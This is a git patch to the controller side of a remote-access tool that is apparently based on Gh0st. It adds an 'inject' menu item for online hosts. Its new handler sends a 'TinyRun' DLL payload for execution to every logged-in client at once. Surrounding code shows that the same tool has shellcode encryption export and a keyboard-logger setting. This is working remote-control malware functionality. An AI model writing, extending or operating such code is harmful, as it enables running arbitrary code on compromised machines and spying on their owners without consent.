From 4b3818fa48f794cf883e62d7c955cf9eadc36d32 Mon Sep 17 00:00:00 2001
From: yuanyuanxiang <962914132@qq.com>
Date: Sat, 6 Dec 2025 11:53:56 +0100
Subject: [PATCH] Feature: Add menu (online host) for injecting shellcode

---
 server/2015Remote/2015Remote.rc               | Bin 106082 -> 106378 bytes
 server/2015Remote/2015RemoteDlg.cpp           |  21 +++++++++++++++++-
 server/2015Remote/2015RemoteDlg.h             |   3 ++-
 server/2015Remote/2015Remote_vs2015.vcxproj   |   1 +
 .../2015Remote_vs2015.vcxproj.filters         |   1 +
 server/2015Remote/res/Bitmap/Inject.bmp       | Bin 0 -> 822 bytes
 server/2015Remote/resource.h                  | Bin 55378 -> 55748 bytes
 7 files changed, 24 insertions(+), 2 deletions(-)
 create mode 100644 server/2015Remote/res/Bitmap/Inject.bmp

diff --git a/server/2015Remote/2015Remote.rc b/server/2015Remote/2015Remote.rc
index 0eb3f2d8335a93c688b0b98e884a9c954ea1faa9..88f3e1c08d87a29fa803116e5c66ffde0d7ea2ac 100644
GIT binary patch
delta 112
zcmaE~hplTrTf-K{4js-HIjMmgy1V^!reD-xG@f3d$S5N0$>7J}#Sjl9{TV_STp0ow
z9H$4eF=}t`&|yrnpS~cKQH&d+#+AXDA!K@DJfrvY3CWBCK+!ygEQVBuWQLOIg2{}+
L+h1ifRu};QeQ6(Q

delta 27
jcmeC$&-Q2!Tf-K{4xQ~{x{OKolULo`u>DXj;|W6mr@{;$

diff --git a/server/2015Remote/2015RemoteDlg.cpp b/server/2015Remote/2015RemoteDlg.cpp
index fe2108f..20b1a42 100644
--- a/server/2015Remote/2015RemoteDlg.cpp
+++ b/server/2015Remote/2015RemoteDlg.cpp
@@ -386,6 +386,7 @@ CMy2015RemoteDlg::CMy2015RemoteDlg(CWnd* pParent): CDialogEx(CMy2015RemoteDlg::I
     m_bmOnline[15].LoadBitmap(IDB_BITMAP_UNINSTALL);
     m_bmOnline[16].LoadBitmap(IDB_BITMAP_PDESKTOP);
     m_bmOnline[17].LoadBitmap(IDB_BITMAP_REGROUP);
+    m_bmOnline[18].LoadBitmap(IDB_BITMAP_INJECT);
 
     for (int i = 0; i < PAYLOAD_MAXTYPE; i++) {
         m_ServerDLL[i] = nullptr;
@@ -539,7 +540,8 @@ BEGIN_MESSAGE_MAP(CMy2015RemoteDlg, CDialogEx)
     ON_COMMAND(ID_TOOL_RELOAD_PLUGINS, &CMy2015RemoteDlg::OnToolReloadPlugins)
     ON_COMMAND(ID_SHELLCODE_AES_C_ARRAY, &CMy2015RemoteDlg::OnShellcodeAesCArray)
     ON_COMMAND(ID_PARAM_KBLOGGER, &CMy2015RemoteDlg::OnParamKblogger)
-END_MESSAGE_MAP()
+        ON_COMMAND(ID_ONLINE_INJ_NOTEPAD, &CMy2015RemoteDlg::OnOnlineInjNotepad)
+        END_MESSAGE_MAP()
 
 
 // CMy2015RemoteDlg 消息处理程序
@@ -1590,6 +1592,7 @@ void CMy2015RemoteDlg::OnNMRClickOnline(NMHDR *pNMHDR, LRESULT *pResult)
     Menu.SetMenuItemBitmaps(ID_ONLINE_UNINSTALL, MF_BYCOMMAND, &m_bmOnline[15], &m_bmOnline[15]);
     Menu.SetMenuItemBitmaps(ID_ONLINE_PRIVATE_SCREEN, MF_BYCOMMAND, &m_bmOnline[16], &m_bmOnline[16]);
     Menu.SetMenuItemBitmaps(ID_ONLINE_REGROUP, MF_BYCOMMAND, &m_bmOnline[17], &m_bmOnline[17]);
+    Menu.SetMenuItemBitmaps(ID_ONLINE_INJ_NOTEPAD, MF_BYCOMMAND, &m_bmOnline[18], &m_bmOnline[18]);
 
     std::string masterHash(GetMasterHash());
     if (GetPwdHash() != masterHash) {
@@ -4022,3 +4025,19 @@ void CMy2015RemoteDlg::OnParamKblogger()
     THIS_CFG.SetInt("settings", "KeyboardLog", m_settings.EnableKBLogger);
     SendMasterSettings(nullptr);
 }
+
+
+void CMy2015RemoteDlg::OnOnlineInjNotepad()
+{
+    auto tinyRun = ReadTinyRunDll(0);
+	EnterCriticalSection(&m_cs);
+	for (auto i = m_HostList.begin(); i != m_HostList.end(); ++i) {
+		context* ctx = *i;
+		if (!ctx->IsLogin())
+			continue;
+		Buffer* buf = tinyRun->Data;
+		ctx->Send2Client(buf->Buf(), 1 + sizeof(DllExecuteInfo));
+	}
+	LeaveCriticalSection(&m_cs);
+    SAFE_DELETE(tinyRun);
+}
diff --git a/server/2015Remote/2015RemoteDlg.h b/server/2015Remote/2015RemoteDlg.h
index 3d13a83..48e715e 100644
--- a/server/2015Remote/2015RemoteDlg.h
+++ b/server/2015Remote/2015RemoteDlg.h
@@ -246,7 +246,7 @@ public:
     CRITICAL_SECTION m_cs;
     BOOL       isClosed;
     CMenu	   m_MainMenu;
-    CBitmap m_bmOnline[18];
+    CBitmap m_bmOnline[19];
     uint64_t m_superID;
     std::map<HWND, CDialogBase *> m_RemoteWnds;
     CDialogBase* GetRemoteWindow(HWND hWnd);
@@ -372,4 +372,5 @@ public:
     afx_msg void OnToolReloadPlugins();
     afx_msg void OnShellcodeAesCArray();
     afx_msg void OnParamKblogger();
+    afx_msg void OnOnlineInjNotepad();
 };
diff --git a/server/2015Remote/2015Remote_vs2015.vcxproj b/server/2015Remote/2015Remote_vs2015.vcxproj
index cc76582..9476d9c 100644
--- a/server/2015Remote/2015Remote_vs2015.vcxproj
+++ b/server/2015Remote/2015Remote_vs2015.vcxproj
@@ -423,6 +423,7 @@
     <Image Include="res\Bitmap\DxgiDesktop.bmp" />
     <Image Include="res\Bitmap\EditGroup.bmp" />
     <Image Include="res\Bitmap\GrayDesktop.bmp" />
+    <Image Include="res\Bitmap\Inject.bmp" />
     <Image Include="res\Bitmap\note.bmp" />
     <Image Include="res\Bitmap\PrivateScreen.bmp" />
     <Image Include="res\Bitmap\proxy.bmp" />
diff --git a/server/2015Remote/2015Remote_vs2015.vcxproj.filters b/server/2015Remote/2015Remote_vs2015.vcxproj.filters
index ff5666e..9c31dd2 100644
--- a/server/2015Remote/2015Remote_vs2015.vcxproj.filters
+++ b/server/2015Remote/2015Remote_vs2015.vcxproj.filters
@@ -176,6 +176,7 @@
     <Image Include="res\Bitmap\remove.bmp" />
     <Image Include="res\Bitmap\PrivateScreen.bmp" />
     <Image Include="res\Bitmap\EditGroup.bmp" />
+    <Image Include="res\Bitmap\Inject.bmp" />
   </ItemGroup>
   <ItemGroup>
     <None Include="..\..\Release\ghost.exe" />
diff --git a/server/2015Remote/res/Bitmap/Inject.bmp b/server/2015Remote/res/Bitmap/Inject.bmp
new file mode 100644
index 0000000000000000000000000000000000000000..c66e97afc404de50fd262d0f4355263b1409bcc4
GIT binary patch
literal 822
zcmZ?rHDhJ~12Z700mK4O%*Y@C7H5FULpTuf4P8KKQK6ZU0ZCSQxi~r5*<8DRqrAMl
zx~l5bsZ#{Cr^LlNnwxgkmTp))%}7Q1!o>^twP-6VoIkwd;FhJ6y84%F`)_MvefHd0
zJX(~bB~R^J+uPbRYt8@poBsFq@3u46I&<zEE-m$i=~MdV%wGF{{>J}RRSQ16et6~V
z83Q$?v**rZ)uOMf(b2YQ@lK%P`R`ub`ws@UuU=7?mN<6&I94rM8j2-ZWq*Etged;?
z`}gYkGnP#6OH53}svan)C@;Hh-D;rvA3uI9n%2K!_9R<t8(fMZ;&RebTh^@FvU0(c
z_WJ8*4zyPluUNJWn11l+Qddz4_jYY>@2Duu|NP>nf|&4?t5@-;hfDSJ^a!!Dox5-m
TE`pzto0WMKN8sSs2$2N<tZZwQ

literal 0
HcmV?d00001

diff --git a/server/2015Remote/resource.h b/server/2015Remote/resource.h
index 09840857f9b0c88c068fe0c527b5bd4d24265569..6ee967a760954fecb6ca38a04366057315c99bef 100644
GIT binary patch
delta 128
zcmcb#f%(X0<_%`fljAG}7|ka$+UZW7<S7H>2~BRetTlOqBg^C|o^qS5oVQJy{9?Zr
zP{~J8)yWrjvrR6!E-~3*wurDNgCBzzLp+f5X9!_%We8w!oP3c-5~PONoWXeV>#MPh
c3X|QhU7Xw!CN^2`y2oUdUJxxYdCB#401x9ZqW}N^

delta 46
zcmX@InfcNN<_%`flRpTsY<}mwZPMg~>k*T8UB56{NkDA!f*T%_|6Bvn5|hPlt^)um
C;}`w_